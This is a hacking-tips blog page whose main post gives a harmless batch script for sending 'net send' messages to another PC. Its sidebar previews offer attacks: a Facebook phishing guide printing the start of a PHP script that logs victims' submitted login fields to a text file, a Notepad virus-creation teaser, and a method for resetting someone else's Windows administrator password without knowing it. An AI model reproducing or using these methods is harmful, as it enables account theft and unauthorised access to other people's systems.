Skip to main content

Chat With Your Friend Through Command Prompt(CMD)

                       Chat With Command Prompt


Hello friends Today I'm going to tell you how to Chat with Command Prompt. You can easily chat with your friend through command prompt by just follow few steps :-


Step 1:- All you need is your friend's IP Address and your Command Prompt.
Step 2:- Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Step 3:- Now save this as "Trick.Bat".
Step 4:- Open Command Prompt.
Step 5:- Drag this file (.bat file) over to Command Prompt and press Enter.
Step 6:- You would then see something like this:

  
Step 7:- Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 

Step 8:- Now all you need to do is type your message and press Enter.
 Start Chatting.......!

DONE....ENJOY.~!!

Comments

Popular posts from this blog

How to hack anyone System in seconds and Create viruses

G et some knowledge about virus... What is Virus ?  A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems   Create Virus on Notepad : It is very easy to create a virus on notepad   H ow to open notepad follow these steps 1. P ush win + R then new window will open then type notepad and click on OK . After that notepad will open then type or paste these command and make a virus.   1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobje...

How to hack anyone facebook account with easiest way.

Hack Facebook Account with Easiest Way. T oday I am going to discuss some methods that can be used to hack a Facebook account password   Today I will cover only way to Hack Facebook Account Password that all hackers usually use to hack your Facebook account . 1 . F acebook P hishing Attack(Today's topic) . 2 . Hacking Facebook account password remotely using K eyloggers. 3 . S ocial Engineering or simply Guessing your friends Password.                                Facebook Phishing You need these three Files : 1.phishing.php 2.password.txt 3.facebook.html 1. Phishing.php File :-   **   Open Notepad and paste the Following code in notepad. header ('Location: https://www.facebook.com/login.php?login_attempt=1 '); $handle = fopen("password.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, ...

hacking windows administration password

Changing Administrator Password using Command Prompt(CMD) A fter reading this post, you’ll be able to change your and anyone’s Administrator account password in windows OS(7,XP AND OLDER VERSION)  without asking him the previous one. Usually, for changing the passwords, we go to User Accounts in Control Panel and then option for changing the passwords. But windows doesn’t permit us to do so, till we enter the previous password. So, it’s clear that we can’t change the password from this method. Because, the current password is also required here, which we don’t know. But, the same thing can become possible, if perform the same task through Windows Command Prompt(CMD). In this method, we are not prompted to enter the current/old password. But for that, we first need to be logged in as an Administrator (see step 2 below), unless you will be shown an error message. So, I don’t want you to get any type of error, that’s why I was focussing on this point. ...